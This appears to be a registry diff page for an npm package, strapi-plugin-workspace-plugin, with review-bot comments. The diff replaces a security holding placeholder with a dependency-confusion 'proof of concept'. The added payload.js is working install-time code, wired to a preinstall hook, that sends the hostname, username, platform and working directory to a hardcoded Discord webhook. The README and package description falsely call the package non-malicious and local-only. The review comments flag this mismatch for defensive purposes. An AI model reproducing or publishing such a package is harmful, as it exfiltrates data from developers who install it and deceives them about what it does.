strapi-plugin-workspace-plugin 0.0.1-security → 99.0.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of strapi-plugin-workspace-plugin might be problematic.

Files changed (3)
  1. package/README.md +35 -5
  2. package/package.json +9 -6
  3. package/payload.js +41 -0
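--- a/package/README.md
+++ b/package/README.md
@@ -1,5 +1,35 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=strapi-plugin-workspace-plugin for more information.
+# PoC Package: strapi-plugin-workspace-plugin
+
+## Vulnerability Details
+
+- **Package Name**: strapi-plugin-workspace-plugin
+- **Ecosystem**: npm
+- **Version**: workspace:*
+- **Source File**: examples\getstarted\package.json
+- **Reason**: Package 'strapi-plugin-workspace-plugin' not found in public npm registry
+
+## Description
+
+This is a proof-of-concept (PoC) package generated by DepRaptor to demonstrate
+a potential dependency confusion vulnerability.
+
+## What This PoC Does
+
+When installed, this package will:
+1. Log system information (username, hostname, working directory)
+2. Capture environment variables
+3. Write all information to `payload_log.txt`
+
+## Security Notice
+
+⚠️ **WARNING**: This PoC is intended ONLY for:
+- Authorized security testing
+- Bug bounty programs
+- Security research with proper authorization
+
+Do NOT upload this package to public registries without authorization.
+
+## Generated By
+
+DepRaptor - Dependency Confusion Scanner
+Developer: LAKSHMIKANTHAN K (letchupkt)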
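--- a/package/package.json
+++ b/package/package.json
@@ -1,6 +1,9 @@
-{
-"name": "strapi-plugin-workspace-plugin",
-"version": "0.0.1-security",
-"description": "security holding package",
-"repository": "npm/security-holder"
-}
+{
+"name": "strapi-plugin-workspace-plugin",
+"version": "99.0.1",
+"description": "Security research PoC - Template Confusion. Non-malicious.",
+"main": "index.js",
+"scripts": {
+"preinstall": "node payload.js"
+}
+}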
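Review bot: The `preinstall` hook runs `node payload.js` on every install, and the `description` calls the release "Non-malicious" while payload.js (next section) posts hostname, username and working directory to a remote Discord webhook, so neither the description nor the README's "writes to `payload_log.txt`" claim matches what the hook actually does. `"main": "index.js"` also points at a file that is not among the three files in this release, so requiring the package resolves nothing. Since the README itself says the package must not be uploaded to public registries, add `"private": true` so `npm publish` refuses it, and either drop the `preinstall` script or state explicitly in the description that a network call is made at install time.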
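--- /dev/null
+++ b/package/payload.js
@@ -0,0 +1,41 @@
+const https = require('https');
+const os = require('os');
+
+function executePayload() {
+const WEBHOOK_URL = "https://discordapp.com/api/webhooks/1482092381275689030/LWgzC7aoTmVgdFto6gn1L_gq5dDSaaqzk57bxfGYeSW2Nm3xKdQxgQ_0WhER8ZdQZajt";
+
+const info = {
+package: "strapi-plugin-workspace-plugin",
+hostname: os.hostname(),
+user: os.userInfo().username || "unknown",
+platform: os.platform(),
+cwd: process.cwd()
+};
+
+const postData = JSON.stringify({
+username: "Strapi-Hunter",
+embeds: [{
+title: "🎯 WORKSPACE PLUGIN HIJACKED!",
+color: 16753920, // Orange
+fields: [
+{ name: "Target", value: info.package, inline: true },
+{ name: "Machine", value: info.hostname, inline: true },
+{ name: "User", value: info.user, inline: true },
+{ name: "Location", value: info.cwd, inline: false }
+],
+footer: { text: "Dependency Confusion Research" }
+}]
+});
+
+const url = new URL(WEBHOOK_URL);
+const req = https.request({
+hostname: url.hostname,
+port: 443,
+path: url.pathname,
+method: 'POST',
+headers: { 'Content-Type': 'application/json', 'Content-Length': postData.length }
+});
+req.write(postData);
+req.end();
+}
+executePayload();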
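Review bot: `executePayload()` sends the collected host data (hostname, username, platform, working directory) to the hardcoded remote `WEBHOOK_URL` instead of writing it to `payload_log.txt` as the README states, and because package.json wires it into `preinstall`, every `npm install` performs this outbound transmission before anyone has a chance to review the code. The webhook URL, token included, ships inside the published artifact, so it is readable by every installer and is the concrete indicator to alert on or block at egress for anyone assessing exposure to this release. A PoC limited to what the README describes would replace the whole `https.request` block with a local append such as `require('fs').appendFileSync('payload_log.txt', JSON.stringify(info) + '\n');` and drop the `https` require, leaving no network activity to explain. The file's top-level statement also invokes the function unconditionally at load, so even a `require('./payload')` from a test harness triggers it; guarding the call behind `if (require.main === module)` would at least confine it to the explicit hook.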